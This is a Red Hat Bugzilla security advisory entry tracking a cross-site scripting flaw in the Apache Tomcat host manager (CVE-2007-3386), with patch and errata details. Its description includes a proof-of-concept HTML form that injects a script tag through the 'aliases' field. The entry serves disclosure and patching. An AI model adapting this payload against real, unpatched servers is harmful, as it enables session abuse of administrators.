Bugzilla will be upgraded to version 5.0 on a still to be determined date in the near future. The original upgrade date has been delayed.
Bug 247994 - (CVE-2007-3386) CVE-2007-3386 tomcat host manager xss
CVE-2007-3386 tomcat host manager xss
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
low Severity low
: ---
: ---
Assigned To: Red Hat Product Security
source=asf,impact=low,public=20070814...
: Security
Depends On: 254150 254151 254152 254153 254154 254155 254156 254157
Blocks:
  Show dependency treegraph
 
Reported: 2007-07-12 11:50 EDT by Mark J. Cox
Modified: 2016-03-04 07:00 EST (History)
1 user (show)

See Also:
Fixed In Version: 5.5.25-1jpp.1.fc7
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2007-11-17 00:34:57 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)
proposed patch (1.06 KB, patch)
2007-07-12 11:50 EDT, Mark J. Cox
no flags Details | Diff


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2007:0871 normal SHIPPED_LIVE Moderate: tomcat security update 2007-09-26 04:27:36 EDT
Red Hat Product Errata RHSA-2007:0876 normal SHIPPED_LIVE Moderate: tomcat security update 2007-10-11 14:21:55 EDT

  None (edit)
Description Mark J. Cox 2007-07-12 11:50:20 EDT
JPCERT#98038604

  Cross-site Scripting in Apache Tomcat host manager

  Assume that after logged in, the victim was lead to the malicious web
  server with following file installed.
  <form action="http://localhost:8080/host-manager/html/add" method="get">
  <INPUT TYPE="hidden" NAME='name' VALUE="aaa">
  <INPUT TYPE="hidden" NAME='aliases' VALUE="<script>alert()</script>">
  <input type="submit">
  </form>

  When the victim accesses to it, then the window pops up.  Therefore
  it is verified that vulnerability exists.

not public
Comment 1 Mark J. Cox 2007-07-12 11:50:20 EDT
Created attachment 159067 [details]
proposed patch
Comment 2 Mark J. Cox 2007-08-16 05:08:53 EDT
now public, opening bug
Comment 9 Fedora Update System 2007-11-17 00:34:46 EST
tomcat5-5.5.25-1jpp.1.fc7 has been pushed to the Fedora 7 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 10 Fedora Update System 2007-11-17 00:37:36 EST
tomcat5-5.5.25-1jpp.1.fc8 has been pushed to the Fedora 8 stable repository.  If problems still persist, please make note of it in this bug report.

Note You need to log in before you can comment on or make changes to this bug.